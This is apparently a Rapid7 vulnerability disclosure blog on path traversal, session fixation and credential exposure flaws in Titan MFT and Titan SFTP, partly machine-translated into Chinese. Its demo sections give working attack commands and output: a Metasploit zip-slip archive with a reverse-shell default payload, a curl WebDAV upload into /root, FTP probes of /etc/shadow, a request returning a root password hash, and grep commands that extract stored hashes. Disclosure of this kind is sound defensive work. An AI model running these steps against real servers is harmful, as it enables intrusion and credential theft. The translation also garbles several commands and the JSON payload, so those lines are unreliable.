最后更新于2023年12月27日(星期三)14:37:41 GMT

作为我们持续研究管理文件传输风险项目的一部分,包括 JSCAPE MFT and Fortra Globalscape EFT服务器, Rapid7 discovered several vulnerabilities 在South River Technologies的Titan MFT和Titan SFTP服务器中. 尽管这些需要特殊情况或非默认配置, 以及一个有效的用户登录, the consequences of exploitation can lead to remote superuser access to the affected host.

Products

Titan MFT and Titan SFTP 企业级管理文件传输(MFT)服务器提供企业级服务吗, 高可用性故障转移和集群. 它们是非常相似的产品,具有相似的代码库, 尽管Titan MFT有一些额外的功能,如WebDAV.

我们确认这些问题影响了泰坦MFT和泰坦SFTP版本2.0.16.2277 and 2.0.17.2298(根据供应商的说法,早期版本也会受到影响). 下面列出的所有问题都会影响Linux版本, and some additionally affect the Windows version (we will note which platforms are affected by which issues).

Discoverer

这些问题是由Rapid7的Ron Bowes发现的. 它们将按照Rapid7的漏洞披露政策进行披露.

Vendor Statement

南河科技致力于安全, 我们与有价值的研究人员合作, such as Rapid7, 代表我们的客户响应和解决漏洞.

Impact

Successful exploitation of several of these issues grants an attacker remote code execution as the root or SYSTEM user; however, all issues are post-authentication and require non-default configurations and are therefore unlikely to see widescale exploitation.

Vulnerabilities

CVE-2023-45685:通过“zip slip”执行身份验证远程代码

Titan MFT和Titan SFTP有一个特性 .zip files can be automatically extracted when they are uploaded over any supported protocol. Files within the .zip archive are not validated for path traversal characters; as a result, 通过身份验证的攻击者可以上传 .Zip文件,包含文件名如 ../../file,它将在用户的主目录之外提取. Linux和Windows服务器都会受到影响, 但我们将以Linux为例来说明如何利用这一点.

如果攻击者可以将文件写入Linux文件系统的任何位置, they can leverage that to gain remote access to the target host in several different ways:

  • Overwrite /root/.ssh/authorized_keys 使用攻击者的SSH密钥,允许他们登录到交互式会话
  • Upload a script to /etc/cron.hourly 它将在将来的某个时刻执行代码
  • Upload a script to /etc/profile.d 该命令将在下次用户登录Linux主机时执行
  • 覆盖系统二进制文件(例如 /bin/bash),并附带了一个后门版本

可以通过两种不同的方式缓解此漏洞:

  1. 这是一个非默认特性, 因此,管理员必须在服务器易受攻击之前对其进行配置
  2. 利用要求用户拥有具有上传文件权限的帐户

Demo

所谓的“拉链滑漏”是一类常见的漏洞, and an example file can be created using a Metasploit module (note that this is a generic module which writes an ELF file containing an executable payload):

msf6 > use exploit/multi/fileformat/zip_slip
[*]没有配置负载,默认为linux/x86/meterpreter/reverse_tcp

msf6 exploit(multi/fileformat/zip_slip) > set FTYPE zip
FTYPE => zip

msf6 exploit(multi/fileformat/zip_slip) > set FILENAME test.zip
FILENAME => test.zip

msf6 exploit(multi/fileformat/zip_slip) > show options

msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../root/testzipslip
TARGETPAYLOADPATH => ../../../../../../../root/testzipslip

msf6 exploit(multi/fileformat/zip_slip) > exploit

[+] test.zip stored at /home/ron/.msf4/local/test.zip
[*]当被提取时,有效载荷将被提取为:
[*] ../../../../../../../root/testzipslip

Then upload it with any protocol that the user has access to (HTTP, FTP, WebDAV, SFTP):

$ NCFTP -u 'testuser' -p 'b.0.0.68
NcFTP 3.2.5(2011年2月2日),作者Mike Gleason (http://www).NcFTP.com/contact/).
Connecting to 10.0.0.68...                                                                                          
TitanMFT 2.0.16.2277 Ready.
Logging in...                                                                                                       
Welcome testuser from 10.0.0.227. 现在您已登录到服务器.
Logged in to 10.0.0.68.                                                                                             
ncftp / > put ~/.msf4/local/test.zip
/home/ron/.msf4/local/test.邮政编码 :                        331年.00 B    7.92 kB/s  

并验证它是否提取了用户主目录之外的文件:

$ ssh root@10.0.0.68 ls /root
testzipslip

Note that the payload generated by Metasploit is an ELF file by default; however, using this technique, 任何文件都可以上传到文件系统的任何位置.

CVE-2023-45686:通过WebDAV路径遍历的认证远程代码执行

WebDAV处理程序不验证用户指定的路径. 这意味着用户可以通过添加 ../ 字符到WebDAV URL. Successful exploitation permits an authenticated attacker to write an arbitrary file to anywhere on the file system, 导致远程代码执行.

WebDAV默认不启用, 因此,管理员必须启用WebDAV才能使目标容易受到攻击. 这也不会影响Titan SFTP, which doesn't support the WebDAV protocol; additionally, as far as we can tell, 这只影响Linux版本的Titan MFT.

Demo

The curl utility with the PUT Verb可用于上传文件(请注意 --path-as-is is required, otherwise curl 将使路径正常化并删除 ../ portion of the URL):

$ curl -i -X PUT -u testuser:b——data-binary 'hi'——path-as-is http://10.0.0.68:8080/../../../../../../../../../root/testwebdav
HTTP/1.1 201 Created
Set-Cookie: SRTSessionId=NV7pXyEHw9bdkofCLp3dI5wMq96N7iLD; Path=/; Expires=2023-Sep-25 10:09:14 GMT; HttpOnly
Connection: close
Server: SRT WebDAV Server
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Accept-Ranges: bytes
ETag:“8 f434346648f6b96df89dda901c5176b10a6d83961dd3c1ac88b59b2dc327aa4”

我们可以验证文件是从SSH会话中写入的:

$ ssh root@10.0.0.68 ls /root/
testwebdav

远程管理服务器的会话固定

类对远程管理服务器的API进行身份验证时 Authorization 头(HTTP基本或摘要身份验证)并设置一个 SRTSession 头值转换为攻击者已知的值(包括字面值字符串) null),会话令牌被授予攻击者可以使用的特权. For example, the following request would make the string "test" into a valid session token:

$ curl -u ron:myfakepassword -ik -H 'Srtsessionid: test' 'http://10.0.0.68:41443/WebApi/Process'

我们最初认为这是一种身份验证绕过, 但后来意识到(通过与供应商讨论) Srtsessionid 值必须在客户端和服务器上匹配, and the likelihood of getting an administrator to set an arbitrary header is exceedingly low. 这对Linux和Windows版本的软件都有影响, although the exploit path for Windows would be different than the Linux path we discuss below.

If an attacker can either steal a session token or trick an administrator into authorizing an arbitrary session token, the administrative access can be used to write an arbitrary file to the file system using the following steps (on Linux):

  • 创建一个具有任意主文件夹的新用户(例如, /root/.ssh)
  • 使用该帐户登录到其中一个文件上传服务,例如FTP
  • Upload a file, such a authorized_keys

由于该服务以root身份运行,因此攻击者可以上传或下载任何文件. We implemented a proof of concept that demonstrates how an attacker can achieve remote code execution on a target system by abusing administrator-level access.

CVE-2023-45688:通过FTP的路径遍历泄露信息

FTP上的SIZE命令不能正确地清理路径遍历字符, 哪一种方法允许经过身份验证的用户获取文件系统上任何文件的大小. 这需要一个可以通过FTP协议登录的帐户, 并且似乎只影响Linux版本的Titan MFT和Titan SFTP.

Demo

你可以用 netcat utility:

$ nc 10.0.0.69 21
220 TitanMFT 2.0.17.2298 Ready.
USER test 
用户名正确,需要输入密码.
PASS a
230 Welcome test from 10.0.0.227. 现在您已登录到服务器.
SIZE ../../../../../../../etc/shadow
213 1050
SIZE ../../../../../../../etc/hostname
213 7
SIZE ../../../../../../../etc/nosuchfile
没有这样的文件或目录

在这个示例中,攻击者可以确定这一点 /etc/shadow is 1050 bytes, /etc/hostname is 7 bytes, and /etc/nosuchfile doesn't exist.

CVE-2023-45689:在管理界面中通过路径遍历进行信息泄露

Using the MxUtilFileAction model, an administrator can retrieve and delete files from anywhere on the file system by using ../ sequences in their path. Linux和Windows服务器都有此问题. Note that administrators have full access to the host's file system using other techniques, 所以这是一个很小的问题.

Demo

注意:这需要一个有效的会话id(在下面的例子中, 2427年a2dd-cbd6-4da3-b504-0fd0d3473beb):

$ curl -iks -H 'Content-Type: application/json' -H 'Srtsessionid: 2427年a2dd-cbd6-4da3-b504-0fd0d3473beb' --data-binary '[{"Model":"MxUtilFileAction",:“ServerGUID db2112ad - 0000 - 0000 - 0000 - 100000000001”,"Action":"l","Data":{"action":"d","fileList":["/var/southriver/srxserver/logs/Local Administration Server/ .../../../../../etc/shadow domainLogs“),真正的}}):“http://10.0.0.68:41443/WebApi/Process'
HTTP/2 200 
内容类型:应用程序/ x-msdownload
日期:2023年9月19日星期二21:02:07 GMT
content-length: 1155
strict-transport-security:信息= 2592000
Content-security-policy: base-uri 'self';
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
referrer-policy: origin
content-disposition: attachment; filename=shadow; filename*=UTF-8''shadow

root:$6$7oOiiC2AyTA6p7LG$mmvUvQYTSN/E9DBfOOGldok6gd6iP8G7SeR20Va30JYCKPp14gzMhmOUrw3o0t6erwwemssYgjcDGqYI/jOWA0:19619:0:99999:7:::
[...]

CVE-2023-45690:通过世界可读数据库+日志的信息泄漏

密码散列出现在世界可读的文件中,包括数据库和日志文件. Non-root accounts with access to the host can use those files to upgrade their privileges to root. 因为在此之前需要shell访问, 这个漏洞相当小, 但我们认为,本地特权升级问题仍然需要解决.

You can use the strings 实用程序以任何用户帐户(也可以加载它们)的方式检查数据库文件 sqlite3):

ron@titan:~$ strings /var/southriver/srxserver/database/srxdbDB2112AD555500000000100000000001.db | grep -o '"PasswordHash":"[^"]*"'
"PasswordHash":"5267768822EE624D48FCE15EC5CA79CBD602CB7F4C2157A516556991F22EF8C7B5EF7B18D1FF41C59370EFB0858651D44A936C11B7B144C48FE04DF3C6A3E8DA"
"PasswordHash":"72A8D535781681A613D4F8ED06192020AFDA3B1B6C3C48A392FFAB2DF033D23F791BB6CCBE3B134B4A721BFE1CFE6CD06581CA74EAAEE5343CCD70DC3115F984"
"PasswordHash":"57E38B3A0621901EC5C64FA1864A5D16E17CE4DDF9CD084E4E72D0EEEC2D270353D033C972E5B5C646422B56F7EAA11FD54BAAC0A19F6A20CC8D93DF6063DB30"

还可以导出日志 journalctl as any user:

ron@titan2:~$ journalctl -u titanmft.Service | grep 'stored hash'
Sep 26 22:28:36 titan2 srxserver[3526]: 2023-09-26 22:28:36 [Info/-/007] Validated incoming user against stored hash [7632AC9FECE0727899598E82E1601669F76D1D2AB75F33AE6A57D21060E22DB93E9D267155909E7EC5EECA20382A18D5D246A4CCAF64466D16974124BA0EC22F] and the result is True
Sep 26 22:34:02 titan2 srxserver[3526]: 2023-09-26 22:34:02 [Info/-/065] Validated incoming user against stored hash [1F40FC92DA241694750979EE6CF582F2D5D7D28E18335DE05ABC54D0560E0F5302860C652BF08D560252AA5E74210546F369FBBBCE8C12CFC7957B2652FE9A75] and the result is True
Sep 26 22:34:15 titan2 srxserver[3526]: 2023-09-26 22:34:15 [Info/-/065] Validated incoming user against stored hash [1F40FC92DA241694750979EE6CF582F2D5D7D28E18335DE05ABC54D0560E0F5302860C652BF08D560252AA5E74210546F369FBBBCE8C12CFC7957B2652FE9A75] and the result is True
Sep 26 22:34:48 titan2 srxserver[3526]: 2023-09-26 22:34:48 [Info/-/061] Validated incoming user against stored hash [1F40FC92DA241694750979EE6CF582F2D5D7D28E18335DE05ABC54D0560E0F5302860C652BF08D560252AA5E74210546F369FBBBCE8C12CFC7957B2652FE9A75] and the result is True

Mitigation Guidance

According to South River Technologies, the issues in this disclosure can be remediated by applying vendor-supplied patches to upgrade to version 2.0.18的Titan SFTP或Titan MFT. Additionally, these issues can be mitigated by configuring Titan SFTP or Titan MFT service to not run under the Local System account but to instead use a specific Windows or Linux user account that has limited privileges.

Timeline

  • 2023年9月- Rapid7发现漏洞
  • 2023年9月28日- Rapid7找到安全联系人并报告问题
  • 2023年9月28日-供应商认可我们的报告
  • 2023年9月30日-供应商告知我们大部分问题已经解决
  • 2023年10月11日——讨论并同意披露日期为2023年10月16日
  • October 16, 2023 - This coordinated disclosure (including this blog and all vendor artifacts)